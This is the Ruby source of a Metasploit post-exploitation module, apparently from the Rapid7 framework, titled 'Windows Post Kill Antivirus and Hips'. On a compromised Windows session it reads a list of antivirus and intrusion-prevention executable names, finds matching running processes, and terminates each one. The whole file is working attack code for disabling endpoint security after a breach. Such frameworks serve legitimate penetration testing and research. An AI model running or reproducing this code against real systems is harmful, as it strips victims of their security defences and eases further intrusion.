modules/post/windows/manage/killav.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Process
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Post Kill Antivirus and Hips',
'Description' => %q{
This module attempts to locate and terminate any processes that are identified
as being Antivirus or Host-based IPS related.
},
'License' => MSF_LICENSE,
'Author' => [
'Marc-Andre Meloche (MadmanTM)',
'Nikhil Mittal (Samratashok)',
'Jerome Athias',
'OJ Reeves'
],
'Platform' => ['win'],
'SessionTypes' => %w[meterpreter powershell shell],
'Notes' => {
'Stability' => [OS_RESOURCE_LOSS],
'Reliability' => [],
'SideEffects' => []
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_sys_process_get_processes
stdapi_sys_process_kill
]
}
}
)
)
end
def run
avs = ::File.read(
::File.join(
Msf::Config.data_directory,
'wordlists',
'av_hips_executables.txt'
)
)
avs = avs.strip.downcase.split("\n").uniq
skip_processes = [
'[system process]',
'system'
]
av_processes = get_processes.reject { |p| skip_processes.include?(p['name'].downcase) }.keep_if { |p| avs.include?(p['name'.downcase]) }
if av_processes.empty?
print_status('No target processes were found.')
return
end
processes_killed = 0
av_processes.each do |x|
process_name = x['name']
pid = x['pid']
print_status("Attempting to terminate '#{process_name}' (PID: #{pid}) ...")
if kill_process(pid)
processes_killed += 1
print_good("#{process_name} (PID: #{pid}) terminated.")
else
print_error("Failed to terminate '#{process_name}' (PID: #{pid}).")
end
end
print_good("A total of #{av_processes.length} process(es) were discovered, #{processes_killed} were terminated.")
end
end